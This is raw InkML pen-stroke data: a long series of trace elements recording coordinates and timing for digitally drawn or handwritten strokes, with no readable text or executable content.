  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5271.1266">7699 11018 5 0,'0'0'52'0,"0"0"-3"0,0 0-9 0,0 0 0 16,0 0-2-16,0 0-1 0,3 8 2 0,-3-8-2 16,-7 5-6-16,6 0 3 0,0 0 4 0,-3 0-6 0,-1 0-10 15,-3 6 7-15,0-2-1 0,-1 1 5 0,-5 2-13 16,-1 0 1-16,-2 2 4 0,-4 2-11 0,-1-1 11 16,0 0-12-16,-2 0 5 0,6-3-1 15,2-4 0-15,-9 8 0 0,10-7-6 0,-3-1 2 0,3 1 2 16,-2-1-3-16,2-1-2 0,-3 0 6 0,1 0-4 15,3-2-7-15,1-1 5 0,-1 1 1 0,-2-1-8 16,-2 1 9-16,1 0-5 0,-3-1-1 0,3 0 3 16,3-3-2-16,-5 4 3 0,2-1-2 15,-3 0 4-15,0-2 2 0,0 1 1 0,0 1 1 0,-8-1-5 16,7 0-7-16,-2-2-2 0,-5 3 0 0,6 1-4 16,1-3-4-16,0-2 10 0,-7 3 10 0,6-1-12 15,2 0 1-15,-2 0-3 0,3-2 4 0,-3 0 0 16,3 3-5-16,1-3 5 0,2 0 2 0,-4-1 4 15,4-1-13-15,-2 2 5 0,0-2-3 0,4 1 1 16,1-2 0-16,-2 0 0 0,-4 3 5 0,7-3-10 16,-2-2 4-16,-5 1 10 0,1 0 0 0,5 1-8 15,-4-2 6-15,4 2-10 0,-5-4-4 0,5 3 7 16,-4-1 5-16,5 0-5 0,-4 0 5 0,0-2 1 16,-1 0-6-16,7 1-3 0,-3 0 9 0,0 0-7 15,3 0 9-15,-3 1-4 0,3-1-9 0,-2-1 5 16,1 1 16-16,1-1-2 0,-1-3 8 0,0 4-11 15,2-3 4-15,1 2 4 0,-1-2 1 0,1 2 0 16,1-3-4-16,1 0 2 0,-2 1-15 0,3-1 9 16,0 0-3-16,1 0-2 0,-1-1 1 0,1-1-4 15,3 0 7-15,-2 0-6 0,2 0 2 0,1-2-6 16,-1 1 8-16,1 6-3 0,0-6 4 0,-3 3-8 16,3-2 4-16,0 3-7 0,0-2-8 0,0 0 13 15,3 1 1-15,-2 1-3 0,0-2 2 0,-1 2-1 16,0-2 0-16,4 1-7 0,-4 2 1 0,0-3 7 0,0 5-2 15,3-6-8-15,-6 7 9 0,3-6-6 16,0 6 3-16,-1-2-1 0,1 0 5 0,0 1 0 16,0 2-8-16,-3 0 7 0,3-1-9 0,0 5-11 15,0-8-17-15,0 7-5 0,0-3-20 0,0 4-13 16,0 0-11-16,3-5-4 0,-3 5-3 0,4-4 5 0,-4 4-51 16,6-2-147-16,-2 1 65 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5640.9596">6247 10787 6 0,'-4'4'38'0,"-1"1"-1"15,-1 2 5-15,0 1-5 0,-2 1 0 0,-1 0-6 16,0 2-1-16,0 3-2 0,0 1-16 0,-2-1 16 16,-1 2 1-16,2 1-5 0,-3-1-1 0,4 1 0 15,-4-3-6-15,4 0-3 0,0-1 3 0,2-2-8 16,-2-2 10-16,3 0-2 0,0 1-6 0,1-6 4 16,1 4 3-16,-1-4-3 0,2-1-1 0,-3 0 0 15,3 4 3-15,-1-3-5 0,0-1-5 0,0-3-1 16,3 3 10-16,1-3-9 0,-7 5 2 0,7-5 4 15,-3 3-4-15,3-3-5 0,0 0 4 0,-6 2-1 16,6-2-7-16,0 0-5 0,0 0-2 0,-5-11-6 16,4 9-7-16,1-3-9 0,-1-4-1 0,2 1-12 15,-1-3 0-15,3 1 6 0,-2-2 2 0,1 1 2 16,2-1-9-16,0-4-25 0,4 2-70 0,-1-2 32 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5888.2495">6196 10890 16 0,'11'7'35'0,"0"6"4"0,0-1-5 16,3 2-4-16,-1-1 8 0,1 0-3 0,5 4 8 15,1 1-7-15,0-2 12 0,-5 0-14 0,1-2-2 16,-1-2 0-16,2-2-5 0,-2 2-9 0,-1-2 3 15,3-1 7-15,-3-1-6 0,1 1-2 0,-3-2 3 16,-1-1-3-16,-1-1 4 0,1 1-11 0,-1-1-2 16,-3-1-9-16,1 0 9 0,-3 0 11 0,-1 0-10 15,1-4-6-15,0 3-6 0,-1-1-19 0,-3 0-27 16,-1-2-17-16,3 4-38 0,-3-4-110 0,0 0 50 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="13286.024">5190 16138 83 0,'0'0'94'0,"0"0"9"0,0 0-12 0,0 0 8 16,0 0-15-16,0 0-7 0,-3-3 4 0,3 3-2 15,0 0-6-15,0 0-17 0,0 0 3 0,0 0-2 0,0 0-7 16,0 0-9-16,0 0-14 0,0 0 7 0,0 0-11 16,0 0 3-16,0 0-8 0,0 0 5 15,0 0-15-15,0 0 1 0,0 0-6 0,14 8-2 16,-11-4 5-16,5-1 4 0,1 2-4 0,8 3 1 0,3-2 1 15,3 6-6-15,7 1 7 0,-1 0-4 16,4-1-6-16,4 5 8 0,9-1-2 0,-10-1 12 0,18 2-9 16,-7 0 0-16,3 0 9 0,6-1-26 0,-5-2 15 15,7-1 3-15,1 1-1 0,2 0 28 16,0 0-4-16,-1 4-7 0,4-4 0 0,-1 5-6 16,-1-4-4-16,27 5 4 0,-29-2-3 0,0-3-3 15,2 1 4-15,2-5-3 0,31 6 1 0,-29-10-4 16,30 4 2-16,-1-6-1 0,-6 1 4 0,-21-6 2 0,30 3 1 15,-8-11 2-15,-25 8-1 0,24-7 5 0,-25 7-7 16,28-7-3-16,-28 2-1 0,-2 4-1 16,-1 1 0-16,-2-4 1 0,-3 0-4 0,-6 4 2 15,-16-1-4-15,-6 2 7 0,-2-1-6 0,-4 1 0 16,-7 1-2-16,-5-2-3 0,-3 1-5 0,0 0-5 16,2-1-26-16,-9 0-43 0,9 5-43 0,-4 0-176 15,-5 2-317-15,-4 4 142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14T15:44:36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5135 6302 6 0,'-17'-6'34'0,"-4"-1"1"0,3 1-8 15,0 3 7-15,4-3-4 0,-1 1 1 0,-2 0-9 16,5 4 4-16,-1-2-7 0,2 0 1 0,-1 0-6 16,0 0 0-16,-2-2-3 0,3 4 1 0,-2 0 1 15,0 0-5-15,-1 0 3 0,0 1-4 0,-4-3-10 16,4 2 15-16,1 1-7 0,1 1 4 0,1-2-2 15,2 1 2-15,-1-1-9 0,-1 3 0 0,0 1-1 16,3-2 4-16,0-1-5 0,1 2 10 0,0-2-3 16,-3 5-5-16,-1 0 2 0,1 1 3 0,-1 0-6 15,3 1 3-15,-2 1 5 0,0 1-9 0,2-1 4 16,-4 2-1-16,1 2-1 0,-2 2 0 16,4-2 4-16,-1 1 3 0,0 2-6 0,-1 1-1 0,1 0-1 15,-1 8-2-15,2-5 2 0,0-2 3 0,-1 7-1 16,3-6-3-16,-2 5 8 0,3-4-5 0,1 0 1 15,1 2 4-15,0-2-6 0,1-2 1 0,2 1-2 16,1 0-3-16,0-2 3 0,0 0-1 0,3 2 2 16,1 0 3-16,1 1-5 0,2 2 9 0,3 3-4 15,1-1 1-15,-1 1-2 0,1-1-2 0,0 1-3 16,3 3 4-16,-1-2-1 0,3-2 5 0,-2-1 1 16,3-1-6-16,-2 5 0 0,2-5 1 0,-1 3 3 15,5-3-8-15,-3-2 1 0,2 0 4 0,1-2 3 16,-6-4-9-16,4-1 12 0,-3-2-4 0,9 4-3 15,-6-8 0-15,8 5 0 0,4-6 0 0,-2 2 4 0,-2-7 5 16,2 1-5-16,-2-1 2 0,-4-1-1 16,4 1 4-16,1-4-6 0,-4 0 8 0,2-2-5 15,2-3-6-15,-1 3-1 0,1-5 7 0,-1 1-4 16,0-2-4-16,-7 5 6 0,-1-2-3 0,6-2 4 16,-5 2-1-16,-3-2-3 0,2 1 1 0,0 0 6 0,-4-1-2 15,2-2 1-15,2 2-3 0,-5-3-2 16,3 0 5-16,-2-1-4 0,-3 0-3 0,2-7 4 15,-3 5-3-15,2-4 3 0,-2-2 4 0,-3 4-10 16,-1 0 12-16,-1 0-10 0,-1 0 4 0,0-1-3 16,-2 2 0-16,1-2 1 0,-2 4 2 0,-1-2-2 15,-1 0 1-15,-1 1 3 0,-1 6-4 0,-1-5 0 16,0 4-1-16,-2 0 2 0,0-4-6 0,0 4 7 16,-1 2-5-16,3-1 1 0,-2 0-1 0,-1 0 2 15,1 2 1-15,-1-1-5 0,1 6 2 0,1-5 2 16,1 3-3-16,-1 1-1 0,-1 1 1 0,1 0-15 0,3 1-18 15,-3 0-20-15,4 3-37 0,-5-1-99 0,5 1 44 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3317.2025">5271 7100 5 0,'0'0'39'0,"0"0"3"16,0 0 6-16,0 0 0 0,0 0-8 0,0 0-6 15,9-10 2-15,-8 4-11 0,3 0 3 0,1-2-3 16,0 1 0-16,-2-2-7 0,-1 5 0 0,2-4 4 15,-1 4 0-15,-2 1-2 0,-1 1-5 0,3-2-2 16,-3 4 1-16,2-6 1 0,-2 6-5 0,0-4-1 16,0 4-3-16,0 0-3 0,0 0 6 0,0 0 0 15,0 0-3-15,0 0 1 0,0 0-13 0,0 0 4 16,-18 16-6-16,10-9 13 0,-2 3-3 0,1 5 8 16,0-3-10-16,-1 2 4 0,5 0 2 0,-3 2-3 15,3-4-1-15,3-1-2 0,-1 0 2 0,-1 0 1 16,4-1-2-16,-1 1 4 0,1-1-2 0,0-6-3 15,0 1 3-15,0 1-6 0,0-2 1 0,0 0-1 16,0-1-6-16,0-3 9 0,0 4 0 0,0-4 0 16,1 4 3-16,-1-4 1 0,0 0-3 0,0 0-2 15,9-8-3-15,-4 5 7 0,1-8-4 0,0 5 1 16,-1-3 3-16,0 2 12 0,-1 2-1 0,-2-1-3 16,1 0 6-16,-2 1 3 0,3 2 2 0,-4-1-2 15,3 1-6-15,-3 3 8 0,1-4-5 0,-1 4-2 16,4-5 0-16,-4 5-6 0,0 0 4 0,1-3 7 15,-1 3 6-15,0 0-19 0,0 0 8 0,0 0-8 16,0 0 7-16,0 0-16 0,0-6 9 0,0 6-9 16,0 0 8-16,0 0-7 0,0 0 4 0,0 0 3 15,0 0 1-15,0 0-4 0,0 0 8 0,0 0-15 16,0 0 1-16,0 0 3 0,0 0-4 0,0 0 7 16,0 0 1-16,0 0-4 0,0 0-2 0,0 0-4 15,0 0 5-15,0 0-1 0,0 0-2 0,0 0 2 16,0 0 0-16,0 0 1 0,0 0-2 0,0 0-7 15,0 0 5-15,0 0-2 0,0 0-4 0,0 0 7 16,0 0-2-16,0 0-1 0,0 0 6 0,0 0-6 16,0 0-3-16,0 0-1 0,0-3 10 0,0 3 6 15,0 0-11-15,0 0 0 0,0 0 1 0,0 0-3 16,0 0 10-16,0 0-5 0,0 0-2 0,0 0 2 16,0 0-1-16,0 0 2 0,0 0-3 0,0 0 5 15,0 0 0-15,0 0-4 0,0 0 17 0,0 0-14 16,0 0 1-16,0 0-4 0,0 0 12 0,0 0-11 15,0 0 0-15,0 0-1 0,0 0 5 0,0-5-5 16,0 5 2-16,0 0 7 0,0 0-7 0,0-4 3 0,0 4-8 16,0 0 4-16,0-4-1 0,0 4 3 0,0 0 7 15,0 0-1-15,3-4-12 0,-3 4 11 16,0 0-1-16,0 0-10 0,0 0 9 0,0 0-8 16,0-5 0-16,0 5 9 0,0 0-7 0,0 0 3 0,1-3-5 15,-1 3-3-15,0 0 4 0,0 0-1 0,2-6-5 16,-2 6 2-16,0 0-8 0,0-4 2 0,0 4-9 15,0 0 9-15,0 0-1 0,0 0-6 16,3-4 3-16,-3 4-5 0,0 0 4 0,0 0-2 16,0 0-1-16,1-4-5 0,-1 4 7 0,0 0-2 0,4-1 3 15,-1-2-3-15,-3 3 4 0,5-2-4 0,-5 2 4 16,0 0 0-16,4-5 4 0,-4 5 0 16,0 0-1-16,0 0 3 0,5-3-4 0,-5 3 4 15,1-2 2-15,-1 2-3 0,0 0 5 0,0 0 2 16,0 0 3-16,3-3-5 0,-3 3 4 0,0 0-1 0,0 0 4 15,0 0-2-15,2-3 2 0,-2 3-4 0,0 0 5 16,0 0-2-16,0 0 0 0,0 0-1 0,0 0 4 16,0 0-5-16,0 0-1 0,4-2 3 15,-4 2 3-15,0 0 0 0,0 0-5 0,0 0 2 0,0 0 2 16,0 0-4-16,0 0 8 0,0 0-7 0,0 0 3 16,0 0 5-16,0 0 0 0,0 0-5 0,0 0-3 15,0 0 3-15,0 0-1 0,0 0 4 16,0 0-4-16,0 0 4 0,0 0-5 0,0 0 4 0,0 0-2 15,0 0 4-15,0 0-7 0,0 0 5 0,0 0-3 16,0 0 4-16,0 0-4 0,0 0 4 0,0 0 1 16,0 0-5-16,0 0-1 0,0 0-1 0,0 0 1 15,0 0-2-15,0 0 7 0,0 0-4 0,0 0-4 16,0 0 0-16,0 0 0 0,0 0-3 0,0 0-9 16,0 0-20-16,0 0 9 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4445.2495">5109 6809 8 0,'0'0'8'0,"0"0"-1"0,0 0-8 16,0 0 4-16,0 0 0 0,0 0-1 0,0 0-7 0,0 0 10 16,0 0-5-16,0 0 3 0,0 0 0 0,0 0 0 15,0 0 0-15,0 0-3 0,0 0-1 0,0 0-1 16,0 0 2-16,0 0 0 0,0 0 5 0,0 0-4 16,0 0 1-16,0 0-4 0,0 0 4 15,0 0-4-15,0 0 4 0,0 0-5 0,0 0 8 0,0 0-5 16,0 0 2-16,0 0-3 0,0 0-2 0,0 0 2 15,0 0 1-15,0 0-1 0,0 0 2 0,0 0-1 16,0 0 3-16,0 0-3 0,0 0-2 0,0 0 2 16,0 0 3-16,0 0-5 0,0 0 2 0,0 0-3 15,0 0 5-15,0 0-11 0,0 0-8 0,0 0 5 16,0 0 31-16,-3 3-24 0,3-3 1 0,0 0 0 16,0 0-3-16,0 0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14T15:52:26.6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6839 8264 1 0,'0'-6'77'15,"0"3"4"-15,0-2 4 0,-1 0 2 0,1-1-4 16,0 0-16-16,0 0 4 0,0-1-6 0,0-3-1 0,1 3-2 16,-1-5-14-16,0 2-6 0,0-3 17 15,3 3 3-15,-2 0-6 0,0-3-6 0,-1-2 2 16,3 2-1-16,-2-1 2 0,3 4 5 0,-4 0 1 0,2-2 4 16,1 2 4-16,-2 2-10 0,2 0-1 15,-6-2-5-15,3 4-5 0,3-2-5 0,-3 3 2 16,0-1-12-16,0-1 5 0,0 4-1 0,0-4 1 15,-3 4 5-15,3-3 2 0,-1 3 5 0,1 3-3 0,-4-7-9 16,4 7-3-16,-2-3-4 0,2 3-1 0,0 0-8 16,-4-3-4-16,4 3-4 0,0 0-3 0,0 0-3 15,0 0-4-15,0 0 1 0,-12 5-7 16,7-1 0-16,-1 3 1 0,-2 2-2 0,-2 4 3 16,-3 1 3-16,4 1-10 0,0-2 5 0,3-2-2 0,-1 0-9 15,4 0 10-15,0-3-3 0,-1-1-8 0,4 0 1 16,0 1 6-16,0-2-4 0,0-1 3 0,1 1-1 15,2-2 4-15,2 3-3 0,0-4 3 0,0 1 1 16,3 1 0-16,-2-5 7 0,3 2-2 0,4-2 1 16,1-2 0-16,4-2 2 0,0-2 2 0,-1-2-4 15,-2 2 0-15,-2-1 4 0,-4 2-3 0,1 0 8 16,-3 1 0-16,0 1 5 0,-2-2-3 0,0-1 4 16,-4 0-2-16,1 1-3 0,0-2 0 0,-2 0-4 15,-2 1-5-15,0-2 7 0,-1 1-2 0,0 0-1 16,-1 2-2-16,-1 2-8 0,-1-6 7 0,-2 6-1 15,2-4-12-15,-1 2-9 0,1 1-7 0,1 1-12 16,-3-1-38-16,4 1-35 0,0 2-32 0,4 1-155 16,-10 6-323-16,5-4 143 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="602.6809">8440 7905 69 0,'0'0'97'16,"0"0"-4"-16,0 0-6 0,0 0-1 0,0 0-12 16,0 0-4-16,0 0-6 0,0 0-6 0,0 0-2 15,0 0-13-15,0 0-7 0,0 0-7 0,0 0 5 16,0 0-20-16,0 0-3 0,0 0 7 0,3 9 3 16,-3-4 0-16,0 7-5 0,0-1 0 0,-1 7 8 15,-1 7-8-15,-2 2-8 0,1 3 16 0,-4 2-3 16,0 3-5-16,2-2-29 0,3 0-29 0,-2 1-20 15,3-2-33-15,1-2-57 0,3-1-165 0,-1-1 74 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1309.9775">11381 7860 8 0,'5'1'55'0,"0"1"-3"0,-5-2-1 15,8 5-6-15,-5-3-3 0,-1 0-9 0,-2-2-1 16,7 3-4-16,-7-3-8 0,6 4-1 0,-5 1 2 16,0-2 0-16,1 2-6 0,-1 2 4 15,0-1 6-15,-2 0-4 0,0 5 0 0,-3 0-1 0,-2 0-5 16,-3 6-1-16,-2-4 11 0,0 3-8 0,2 1 5 15,-3-3-4-15,3-6-7 0,0 1-2 0,4 0 0 16,0-1 2-16,1-2-9 0,3 2 10 0,-4-3-7 16,5 3 6-16,2 0 2 0,2-1 2 0,4 2-9 15,1-2 5-15,10 0 0 0,9 2 2 16,5-5 2-16,2 1-11 0,3-1 4 0,2-1-16 0,11-1-10 16,-10-1-27-16,-3 2-20 0,2 2-51 0,-3-3-123 15,-4 0 54-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2075.0994">13805 7721 22 0,'7'-3'70'0,"2"0"0"15,-3 2-3-15,-1 1-3 0,0-3-22 0,2 3 14 16,-7 0-15-16,11-2-1 0,-7 2-3 0,-4 0-8 15,9 0-8-15,-9 0 5 0,7 0-7 16,-7 0-6-16,8 1 0 0,-8-1-13 0,5 2 17 0,-1 4-8 16,-4-2 0-16,4-2 4 0,-4 2-7 0,0 3-2 15,0 0 7-15,-4 2 0 0,2 1-3 0,-2-1-3 16,-3 7-5-16,0-6 11 0,2 2-5 16,-2-1-2-16,1-1 0 0,1 2-1 0,-4 3 1 15,4-3 1-15,0-2-11 0,0 5 6 0,3-2-3 0,0 3-2 16,3 0-8-16,2 0 10 0,3-1 2 0,0 1 2 15,3-1-1-15,1 1-11 0,3-3 6 0,3 3 11 16,-1-2-3-16,2 0-13 0,-1-3 9 0,-1 0 2 16,1 1-8-16,-1-2 3 0,-6-2 1 0,3-2 2 15,-3 0-1-15,-3-1-2 0,-1-1 7 0,0-1-9 16,-2 1 9-16,2-1-11 0,-5-1 12 0,0-2 6 16,-8 9-7-16,2-5 1 0,-6 0 6 0,-4 0-17 15,-2 3-11-15,-4-1-36 0,-5 1-52 0,4-1-116 16,5-3 52-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2647.1562">16512 7554 62 0,'0'-7'70'0,"0"7"-4"16,0 0-16-16,0 0-7 0,0 0-10 16,0 0-1-16,0 0-1 0,0 0-6 0,0 0 2 15,0 13-2-15,2-3-6 0,0 0 2 0,1 1 2 16,3 4-5-16,0-3 4 0,2 2-5 0,1 1 1 0,5-1-4 15,-1 1 0-15,2-1-2 0,1 0 2 16,0-3-3-16,-1 1-15 0,5-3 25 0,-4 1-4 16,2-3-17-16,-4-1-14 0,0-1-13 0,-1-2-13 15,-2 0-15-15,2 1-40 0,-5-4-102 0,2 0 46 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2832.6877">16801 7510 5 0,'0'0'82'16,"-13"5"-1"-16,3 5-8 0,-8 3-11 0,-10 7 2 15,-9 14-7-15,-3 6-28 0,-20 21 19 0,20-11-57 16,-26 24-73-16,6 1-90 0,18-29 40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14T15:54:21.8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7845 3660 6 0,'-4'-3'108'0,"4"-2"-1"0,-2 0-13 0,2 2 7 16,-2-2-3-16,0 2-4 0,-1-1 12 0,3 0-1 15,-3 1 4-15,3 3-3 0,-1-5-5 0,1 5-9 0,-2-3-7 16,2 3-16-16,0 0-6 0,-4-2-8 15,4 2-7-15,0 0-8 0,0 0-7 0,0 0-7 16,0 0-2-16,0 0-5 0,0 0-5 0,0 0-2 16,-8 15-1-16,2-3 2 0,-2 3 2 0,2 5-7 15,-2 4 2-15,-1 3 3 0,1 0-8 16,3-3 0-16,1 1-1 0,3-8-2 0,0 2-3 0,3 0-3 16,0-4 1-16,2-4 1 0,1 2-2 0,0-2 0 15,2 0 0-15,-2-1 6 0,5-3-5 0,-3-1 2 16,3-2-1-16,1 1 3 0,0-4 1 0,3-4 2 15,4-4-2-15,9-6-4 0,-3 0 2 0,-1-3 0 16,-2-3 8-16,-2 0-3 0,1-6-6 0,-3 1 3 16,-2 1 1-16,-3 0 1 0,-2-2 3 0,-2 0-10 15,-2 0 4-15,-1 0 0 0,-4-1-20 0,-1 0 4 16,-1 1 4-16,1 4 4 0,-5 0 8 0,-1-3-15 16,-2 5 4-16,4 2-4 0,-5 2-4 0,1 1-6 0,3 3 1 15,-1 2-13-15,1 2-23 0,1 1-41 16,0 2-38-16,2 4-83 0,2 0-238 0,-7 9 105 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="523.4299">10334 3314 52 0,'0'0'54'0,"0"11"-2"0,-3-3-7 16,0 5 3-16,-3 4 10 0,-2 8-11 0,-5 1 11 16,3 1-7-16,-3 3 3 0,-1-3-2 0,1 4-5 15,1-3-5-15,3 4-6 0,2-4 7 0,-2 2-13 16,4 0 1-16,1 2-4 0,-1-4-8 0,5 1-29 15,0 0-22-15,1 1-46 0,1 0-43 0,2-1-132 16,-1-8 59-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1219.0326">13915 3473 12 0,'13'8'53'0,"-4"-2"-4"0,5 2 0 15,-1 0-4-15,2 1-2 0,-6-2-2 0,0 2-5 16,3 0 7-16,-6 2-1 0,-1 0-13 0,0 1 4 16,-2 0 0-16,-2 6-7 0,-1-2 1 0,-4 1-6 15,-5 1-1-15,-1 7 14 0,-1-9-12 0,-1-2-10 16,-2 3 5-16,-3 1-5 0,2-3 5 0,2-2-4 15,-1-2 3-15,1 0 0 0,4-5-9 0,2 1-2 16,1-2-4-16,2-1-4 0,1-1 2 0,0 1 4 16,3 3 0-16,3-4-4 0,4 6 0 0,5-3 7 15,7 0 3-15,12 2-8 0,5-2 3 0,2-2 3 16,17 4-2-16,0-7-9 0,-1 3-20 0,-16-2-25 16,16 1-22-16,-1 0-39 0,-13-2-119 0,19 3 52 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1937.7594">17223 3346 35 0,'10'5'35'15,"3"4"-3"-15,-3-3 2 0,4 6-6 0,-6-3-4 0,2 0-1 16,-2 1 1-16,-2 1-3 0,-2 1 0 0,0 0-6 16,-4 3 5-16,-2-2-3 0,-3 2-2 15,-4 1-2-15,-1 1 12 0,-5 5-5 0,-6-2-11 16,-2-1 13-16,4-4-6 0,1-1-5 0,3-2-3 15,0-1-2-15,2 0-2 0,1-3 0 0,2-2-2 16,2 2-1-16,1 2 1 0,3-1 3 0,0 0-5 0,4-1 3 16,0 3 3-16,4 0-3 0,3 5 3 0,8-6-5 15,-1 3 3-15,9 5-2 0,1-1 5 16,3-3 1-16,-2 0-1 0,5-1-6 0,-6 1 5 16,2-1-2-16,-6-6-3 0,-3 1 5 0,1-2-3 15,-7-1 0-15,-1 1-2 0,-1-1 3 0,-4-4 11 16,2 3 6-16,-5-2 11 0,3 0 10 0,-5-2 14 0,4 2-2 15,-4-2 1-15,0 0-18 0,-10 4-2 0,1-2-2 16,-13 2-4-16,-1 2-7 0,-6-3-6 16,1 1-12-16,0 0-21 0,-2 0-14 0,11 0-24 15,-3-1-26-15,5 1-59 0,4-2-151 0,1 0 68 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2473.6132">20336 3316 41 0,'-15'26'60'16,"-3"-2"-4"-16,4 5-11 0,0-3-6 0,2 0-1 15,4-3-5-15,2-4-1 0,2 1-4 0,0 0 2 16,4-3-6-16,3 8-3 0,1-5 2 0,2-3-4 15,3 2 6-15,0-2-7 0,9 5 7 0,0 0 3 16,2-3 3-16,3-2-4 0,5-1 0 0,-1-1 1 16,4-2-8-16,3-3 7 0,1-5-9 0,-3-1 4 15,0 2-8-15,-3-6-13 0,-1 2-6 0,-11-4-11 16,0-2-6-16,-1-2-6 0,1-2-7 16,-7 3-6-16,4-6-4 0,-6 2-11 0,3-4-36 0,1-3-100 15,-3-1 44-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2640.3284">20667 3443 48 0,'-46'40'58'0,"-19"22"-5"16,1 2 2-16,1 4-10 0,2-2 8 0,1 2-35 15,6 2-73-15,-5-5-61 0,19-16 27 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="6972.2369">7093 11743 14 0,'0'0'41'0,"2"-4"-2"0,-2 4-6 16,0 0-6-16,0 0-1 0,0 0-9 0,0 0 0 15,0 0-2-15,0 0-2 0,0 0-2 0,0 0 2 16,0 0-9-16,0 0-1 0,0 0 1 0,0 0 2 16,-3 16-3-16,3-9 3 0,-1 6-1 0,0-2-4 15,1 6 3-15,1 0-2 0,-1 0-2 0,0 1 1 16,4-1 2-16,-3-2-2 0,5-1 0 0,-1-1 4 15,0-3-1-15,1 1 0 0,-1-3-3 0,3 2 0 16,0-3 1-16,0 1 2 0,0-3 2 0,2 1-5 16,-1 1 2-16,1-5-1 0,0 1 0 0,3 1 1 15,0-1 4-15,1-1-5 0,-4-2 0 0,4-2 4 16,-1-1-3-16,-1 1 0 0,0-1 5 0,-1-1-5 16,-1-3 6-16,1 1-1 0,-1 1 1 0,-1-3-1 15,0 0 14-15,-4-1 8 0,1-1-3 0,-1 3-2 16,-4-5 1-16,2 2-2 0,-5-3 0 0,2 2 12 15,-2-1 9-15,-1-4-7 0,-1 3-5 16,-2 2-2-16,1 1 4 0,-3 0-7 0,0 2-10 0,1-1 2 16,-2 3-3-16,0 0 1 0,3 2 1 0,-4 0-14 15,-2 2 9-15,3 1-5 0,-3 1-7 0,-2 4 2 16,3 0-13-16,0 2-27 0,0 1-13 0,-1 5-10 16,2 4-6-16,3 0-60 0,0 2-136 15,2 0 61-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="10669.8441">9639 5614 20 0,'0'0'37'0,"3"-4"-11"16,-3 4-3-16,0 0-5 0,2-2 6 0,-2 2-7 16,0 0-5-16,7 0-1 0,-7 0 3 0,10 0-7 15,-4 2 4-15,4-2 8 0,2 3-9 0,6-3-3 16,-2 2 1-16,2 1-2 0,3 0-1 0,0 0-1 16,6 0 4-16,-5-2-1 0,9 3 0 0,-1 1-3 15,0-3 1-15,2 1-1 0,0-2 0 0,6 0 4 16,12-1 0-16,2 1-2 0,1-2 1 15,0 0 5-15,1 2-5 0,4-1 1 0,-2 0-1 0,0 0 3 16,2 0-2-16,-1 0 2 0,-1 0 0 0,-1 0-4 16,5 0 1-16,-5 0 0 0,8 1 3 0,2-1-3 15,-2 1 0-15,26-1-2 0,-25 5 6 0,2-3-3 16,25 2-5-16,-27-2 6 0,0 0-6 0,27 3-1 16,-29-1 4-16,4-1-1 0,26 1 6 0,-3-1-5 15,4 3 3-15,-1-4-2 0,4 3 1 0,-4-1-1 16,2 0-5-16,-28-1 3 0,31 4-1 0,-1 1 2 15,1-2-1-15,-5 3 2 0,0-2-2 0,4 2 4 16,-5-2-1-16,3 3-4 0,-2-4 1 0,-27-2-2 16,34 2 3-16,-3 0 3 0,-7 2-3 0,10 0 2 15,4-2 2-15,-3 0 0 0,2 2-5 0,-1-2 7 16,-3-3-8-16,2 2 9 0,10 4 2 0,2-2 0 16,7-2 0-16,0 0 2 0,-3 2 2 0,-2-4-1 15,4 3-6-15,-6-1 9 0,10 1-10 0,0 1 4 16,5-1 1-16,-5-2-3 0,-3 2-4 0,-1-2 15 15,5-2-11-15,7 2 3 0,2-2-4 0,2-2 3 16,1-3-4-16,-7-2 6 0,1 5-8 0,0-4 6 16,-1 4 1-16,5 0-2 0,-5-2 3 0,-7 2-3 15,-5-2-7-15,2 0 4 0,-3 1 3 0,-2-1 1 16,-1-1-2-16,-2 1-9 0,-8-2 14 0,-4-1-13 16,-2 2-5-16,-32 0 8 0,32-5 2 0,-35 4-1 15,3 2 2-15,3-3 2 0,-7 1-7 0,-4 1 4 16,-15 0-4-16,-5 1 5 0,-4 0-5 0,-10 0-3 15,-2 1-1-15,-8 2-6 0,-1-2 9 0,-2 2-8 16,-1 1-20-16,-2 1-23 0,-1 2-26 0,-5 7-38 16,-11 11-62-16,-11 5-185 0,-19 12 82 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="14456.8546">5797 14056 2 0,'30'2'2'0,"1"-2"1"16,-1-2 2-16,2 2 3 0,0 0-3 0,-1 0 2 0,3 0-1 15,0 1 0-15,1-3-2 0,4 2 1 0,-4-2 1 16,2-1 2-16,-1 2-3 0,0-4-1 0,0 1-1 16,-2 1 2-16,2 0 1 0,-1 0-3 15,0 1-1-15,-1-1 6 0,0-1-5 0,3 0 6 16,0 1 0-16,-1 0-7 0,1 0 7 0,-1-1 2 15,0-2 0-15,1 3 0 0,0-2-1 0,-4 3 0 16,3 1 4-16,-3-2-2 0,-1 3-4 0,-1-3 1 0,-2 3-1 16,-2-2 3-16,-4 2-3 0,-4-1 4 0,0 2-1 15,-1-1-2-15,-3 2 0 0,-1-2 1 16,-2 0-5-16,0 0 1 0,0 0 7 0,-1 0-2 16,0 0 1-16,0-2 7 0,1 2 1 0,-12 0-5 15,18-1 2-15,-12 1 6 0,-6 0 2 0,16 0-3 16,-10 0-2-16,-6 0-1 0,0 0-4 0,12-2 7 15,-12 2 7-15,6-1 3 